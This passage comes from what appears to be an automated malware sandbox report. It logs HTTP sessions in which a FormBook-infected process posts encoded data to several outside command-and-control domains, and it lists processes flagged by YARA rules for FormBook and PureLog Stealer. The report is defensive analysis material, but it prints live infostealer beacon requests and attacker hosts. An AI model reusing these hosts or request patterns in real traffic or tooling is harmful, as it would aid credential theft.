                                                                              33 | 192.168.2.10 | 50010 | 209.74.77.107 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:55.552484989 CET | 634 | OUT | POST /fbpt/ HTTP/1.1
                                                                              Host: www.beyondfitness.live
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.beyondfitness.live
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.beyondfitness.live/fbpt/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=hF42VS9OEqvX3julElbxkE80MbdvLBeyK0juN8r0Tv6un4uXhSOSi9mZZ8bbOaj2Bu8aMOVxXFVKXXU4Nn+h5kshvo3fqpVLCn1huoUP4XyJSweunJ4EC4UWiZu5VpxM4joLfozFK0gO8lpX1B7IzpNw/fdn5/H2g4og9uTrqak+V9eY00x10UmQDW0i
                                                                              Dec 2, 2024 14:45:56.855241060 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:45:56 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              34 | 192.168.2.10 | 50011 | 209.74.77.107 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:58.214344978 CET | 658 | OUT | POST /fbpt/ HTTP/1.1
                                                                              Host: www.beyondfitness.live
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.beyondfitness.live
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.beyondfitness.live/fbpt/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=hF42VS9OEqvX3C+lIjTxsE8zJbdvChe2K0vuN+HdTdOunY+XgTOSl9mZWcbaKajDBuwSML9xXExKXV84OQKurksjjI3R15VLCn1huoAh4XqJSBuulo4HLYUX1pu5G5xI4jpufr3vK2IO8kZXwA7X6pN6y/c39uyuiq8Jy8Tfr7smScjfllQinj6eNQBItsnNHFQSrm3HfA/leY+FUg==
                                                                              Dec 2, 2024 14:45:59.515208006 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:45:59 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              35 | 192.168.2.10 | 50012 | 209.74.77.107 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:46:00.883522987 CET | 1671 | OUT | POST /fbpt/ HTTP/1.1
                                                                              Host: www.beyondfitness.live
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.beyondfitness.live
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.beyondfitness.live/fbpt/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF= [TRUNCATED]
                                                                              Dec 2, 2024 14:46:02.134522915 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:46:01 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              36 | 192.168.2.10 | 50013 | 209.74.77.107 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:46:03.548378944 CET | 361 | OUT | GET /fbpt/?6NVpdLF=sHQWWiJRbY7Czg+pdBTXnWo2YpYQcCCmWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqw9U1Fq6zryNJuPCt39bkn3VWjex276Q==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.beyondfitness.live
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:46:04.854644060 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:46:04 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              37 | 192.168.2.10 | 50014 | 77.68.64.45 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:46:10.528140068 CET | 631 | OUT | POST /dm4p/ HTTP/1.1
                                                                              Host: www.dietcoffee.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.dietcoffee.online
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.dietcoffee.online/dm4p/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=qCODU1Ebwnhg6TSnaVpSJhz1mHFgjrvu6lafUU+g0DgZhSmQlMDnJ632oP/6dfaoRn0P6viKy/Mq3W0ChEgnxELsrdt8D35QJICg8M5rafX50rmoOMERc3ir+C0mm86wi99ZUK27w9RJNfIWxY8OEFPUF4Gs/o/TqUQpEIYVpr1vVsdk7ov3mgTboKlQ
                                                                              Dec 2, 2024 14:46:11.791536093 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.25.3
                                                                              Date: Mon, 02 Dec 2024 13:46:11 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Content-Encoding: gzip


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              38 | 192.168.2.10 | 50015 | 77.68.64.45 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:46:13.197489977 CET | 655 | OUT | POST /dm4p/ HTTP/1.1
                                                                              Host: www.dietcoffee.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.dietcoffee.online
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.dietcoffee.online/dm4p/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=qCODU1Ebwnhg4zinJmRSIBz273FgoLvi6lWfUV6w0QUZmxyQ39DnI632gv/7Q/avRn4p6rqKy+oq3TYCizMkxUL5qttyMX5QJICg8Io8afP51b2oOtEQf3is2i0m3s6Oi993UJzuw/pJNf4WyKEJTVPoB4HF+42rsEU3CL5erq1Mbtgjq5Og1XPVmMQ6Cq4Mdu+0yqEXjXgrcZZhMA==
                                                                              Dec 2, 2024 14:46:14.520742893 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.25.3
                                                                              Date: Mon, 02 Dec 2024 13:46:14 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Content-Encoding: gzip


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              39 | 192.168.2.10 | 50016 | 77.68.64.45 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:46:15.872236013 CET | 1668 | OUT | POST /dm4p/ HTTP/1.1
                                                                              Host: www.dietcoffee.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.dietcoffee.online
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.dietcoffee.online/dm4p/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF= [TRUNCATED]
                                                                              Dec 2, 2024 14:46:17.134747982 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.25.3
                                                                              Date: Mon, 02 Dec 2024 13:46:16 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Content-Encoding: gzip


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              40 | 192.168.2.10 | 50017 | 77.68.64.45 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:46:18.535096884 CET | 360 | OUT | GET /dm4p/?6NVpdLF=nAmjXBwFyC120iWFa15+GTz1nnoe6LyW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4AzFSQlsxYI3pCP4WG49cxd9TY9P6nbg==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.dietcoffee.online
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:46:19.758452892 CET | 373 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.25.3
                                                                              Date: Mon, 02 Dec 2024 13:46:19 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Content-Length: 203
                                                                              Connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dm4p/ was not found on this server.</p></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              41 | 192.168.2.10 | 50018 | 146.88.233.115 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:46:26.151315928 CET | 631 | OUT | POST /qtfx/ HTTP/1.1
                                                                              Host: www.smartcongress.net
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.smartcongress.net
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.smartcongress.net/qtfx/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=HflE8l++v44HtKQzz5+/zGKTzyiXaCjV6BJMpsDV0Mm1smFq8jmIkJJtYDjGMX6rqs2wCrZVWppBwohjxoOvH06efju3JE9hOW5pf9Emi1dH2VOll9VqgjXRrcXqdv2stKl0vl2gWC5rbpCRYk35Oj+5EH54OI84549KZPgaMVeCAV5QWAyq2rFuMVag
                                                                              Dec 2, 2024 14:46:27.683649063 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                              content-type: text/html; charset=iso-8859-1
                                                                              content-length: 196
                                                                              date: Mon, 02 Dec 2024 13:46:27 GMT
                                                                              server: LiteSpeed
                                                                              x-tuned-by: N0C
                                                                              connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              42 | 192.168.2.10 | 50019 | 146.88.233.115 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:46:28.828331947 CET | 655 | OUT | POST /qtfx/ HTTP/1.1
                                                                              Host: www.smartcongress.net
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.smartcongress.net
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.smartcongress.net/qtfx/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=HflE8l++v44H/7gz0eS/ymKS/SiXNSic6B1MpoSK0+y1tH1q/mSInJJtQjiCTH6aqsqOCrlVWp9BwpRjyfSsdE6QSDuiWU9hOW5pf9hui2tH2EeljpBtpDXS9MXqZv2gtKlCvnTHWE9rbpyRb134ZT+/a34nOKtOj4RpbMdXS0SZOUEXHRT9lcZgCTvKRfUSgAdblm3sc/El5AZp6g==
                                                                              Dec 2, 2024 14:46:30.360930920 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                              content-type: text/html; charset=iso-8859-1
                                                                              content-length: 196
                                                                              date: Mon, 02 Dec 2024 13:46:29 GMT
                                                                              server: LiteSpeed
                                                                              x-tuned-by: N0C
                                                                              connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              43 | 192.168.2.10 | 50020 | 146.88.233.115 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:46:31.489902020 CET | 1668 | OUT | POST /qtfx/ HTTP/1.1
                                                                              Host: www.smartcongress.net
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.smartcongress.net
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.smartcongress.net/qtfx/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF= [TRUNCATED]
                                                                              Dec 2, 2024 14:46:32.971956015 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                              content-type: text/html; charset=iso-8859-1
                                                                              content-length: 196
                                                                              date: Mon, 02 Dec 2024 13:46:32 GMT
                                                                              server: LiteSpeed
                                                                              x-tuned-by: N0C
                                                                              connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              44 | 192.168.2.10 | 50021 | 146.88.233.115 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:46:34.213931084 CET | 360 | OUT | GET /qtfx/?6NVpdLF=KdNk/QG/ntQJ0Ylui7yy1ELkvwiUPibsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLKl2XaG/4RF1XL2skPecvq2g7m0aOng==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.smartcongress.net
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:46:35.485975027 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                              content-type: text/html; charset=iso-8859-1
                                                                              content-length: 196
                                                                              date: Mon, 02 Dec 2024 13:46:35 GMT
                                                                              server: LiteSpeed
                                                                              x-tuned-by: N0C
                                                                              connection: close
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                              Target ID:2
                                                                              Start time:08:42:37
                                                                              Start date:02/12/2024
                                                                              Path:C:\Users\user\Desktop\Quotation Validity.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Quotation Validity.exe"
                                                                              Imagebase:0xee0000
                                                                              File size:919'040 bytes
                                                                              MD5 hash:10F86C0378F3F9EABAE2129174962DF1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.1306858110.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.1304383936.0000000004419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.1302792187.000000000345F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:08:42:40
                                                                              Start date:02/12/2024
                                                                              Path:C:\Users\user\Desktop\Quotation Validity.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Quotation Validity.exe"
                                                                              Imagebase:0x890000
                                                                              File size:919'040 bytes
                                                                              MD5 hash:10F86C0378F3F9EABAE2129174962DF1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1713438377.0000000003BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1704236127.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:08:43:12
                                                                              Start date:02/12/2024
                                                                              Path:C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe"
                                                                              Imagebase:0x560000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3732187285.0000000002910000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:12
                                                                              Start time:08:43:14
                                                                              Start date:02/12/2024
                                                                              Path:C:\Windows\SysWOW64\isoburn.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                                              Imagebase:0xa20000
                                                                              File size:107'008 bytes
                                                                              MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3729826562.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3732445014.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:13
                                                                              Start time:08:43:27
                                                                              Start date:02/12/2024
                                                                              Path:C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe"
                                                                              Imagebase:0x560000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3734770459.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:17
                                                                              Start time:08:43:40
                                                                              Start date:02/12/2024
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x7ff613480000
                                                                              File size:676'768 bytes
                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true


                                                                                Execution Graph

                                                                                Execution Coverage:11.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:4.9%
                                                                                Total number of Nodes:345
                                                                                Total number of Limit Nodes:18

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: '2q$$2q
                                                                                • API String ID: 0-1962809717
                                                                                • Opcode ID: 9f0fac483eef0a6f3aa64facf53cc482cf82e68967ddd5aa6de12b7010e15f53
                                                                                • Instruction ID: 5f0e291bdccfd74e2de3a0a9be97d79364b7b0bb9a156f23c579f2d29b362544
                                                                                • Opcode Fuzzy Hash: 9f0fac483eef0a6f3aa64facf53cc482cf82e68967ddd5aa6de12b7010e15f53
                                                                                • Instruction Fuzzy Hash: E9F2D534A21319CFDB55DF64C888A99B7B1FF89300F5182E9E409AB261DB71AEC5CF40

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: '2q$$2q
                                                                                • API String ID: 0-1962809717
                                                                                • Opcode ID: d153afda3d08d74525bb183ab0c17994ecec6966cc2ba92478838c6b4e4d5913
                                                                                • Instruction ID: aed787e91ad6986c6dea0fd09b746c24c0b6993b1ea0f9a323269320fac63042
                                                                                • Opcode Fuzzy Hash: d153afda3d08d74525bb183ab0c17994ecec6966cc2ba92478838c6b4e4d5913
                                                                                • Instruction Fuzzy Hash: 78F2E534A21319CFDB55DF64C898A99B7B1FF89300F5182E9E409AB261DB71AEC5CF40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 0182D5DE
                                                                                • GetCurrentThread.KERNEL32 ref: 0182D61B
                                                                                • GetCurrentProcess.KERNEL32 ref: 0182D658
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0182D6B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 0182D5DE
                                                                                • GetCurrentThread.KERNEL32 ref: 0182D61B
                                                                                • GetCurrentProcess.KERNEL32 ref: 0182D658
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0182D6B1
                                                                                Memory Dump Source
